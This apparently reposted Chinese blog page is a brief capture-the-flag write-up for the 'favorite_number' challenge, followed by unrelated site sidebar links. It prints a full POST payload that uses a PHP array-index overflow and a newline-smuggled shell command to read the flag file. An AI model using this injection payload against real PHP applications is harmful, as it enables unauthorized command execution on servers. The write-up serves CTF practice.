当前位置:网站首页>攻防世界-favorite_number
攻防世界-favorite_number
2022-08-02 17:13:00 【NCNIPC梅苑】
favorite_number
首先泄露了php的版本
同其他师傅的payload不同的是
我的post数据中多了个分号;
最后是通过写文件打印文件的形式拿到的flag
stuff[4294967296]=admin&stuff[1]=user&num=123%0Aprintf /fla > /tmp/hello %26%26 printf g >> /tmp/hello %26%26 tac `tac /tmp/hello`;
边栏推荐
- 什么是实时流引擎?
- 图解LeetCode——622. 设计循环队列(难度:中等)
- Ubuntu系统下用docker安装oracle
- Oracle分析归档日志内容时,发现很多null?
- MySQL常见面试题汇总(建议收藏!!!)
- Five speakers: seventy genius_platform software platform development 】 【 turn YUY2 RGB24 implementation source code
- npm install报gyp info it worked if it ends with ok
- Mysql开启binlog
- 持续交付(一)JenkinsAPI接口调用
- Several common cross-domain solutions
猜你喜欢
随机推荐
什么是APS系统?导入APS要注意什么?值得反复观看
MySQL常见面试题汇总(建议收藏!!!)
golang源码分析(5):sync.Once
年轻人接棒大妈,金价跌回“4字头”,七夕迎黄金消费小热潮
Flink SQL builds real-time data warehouse DWD layer
2022高压电工特种作业证考试题库及答案
oracle 和mysql 语句结果不一致问题
golang源码分析(13)gorpc源码分析
NAACL 2022 | 具有元重加权的鲁棒自增强命名实体识别技术
小程序毕设作品之微信体育馆预约小程序毕业设计成品(6)开题答辩PPT
融云「 IM 进阶实战高手课」系列直播上线
Inconsistency between oracle and mysql statement results
Kubernetes:(五)Pod进阶(资源限制、健康检查)
融云「 IM 进阶实战高手课」系列直播上线
一文搞懂│php 中的 DI 依赖注入
Kubernetes:(七)优化大法(江湖失传已久的武林秘籍)
MySQL索引
npm install 时,卡住不动,五种解决方法
腾讯架构师是如何解释:Redis高性能通信的原理(精华版)
Wechat Gymnasium Appointment Mini Program Graduation Design Finished Works Mini Program Graduation Design Finished Work (6) Question Opening Reply PPT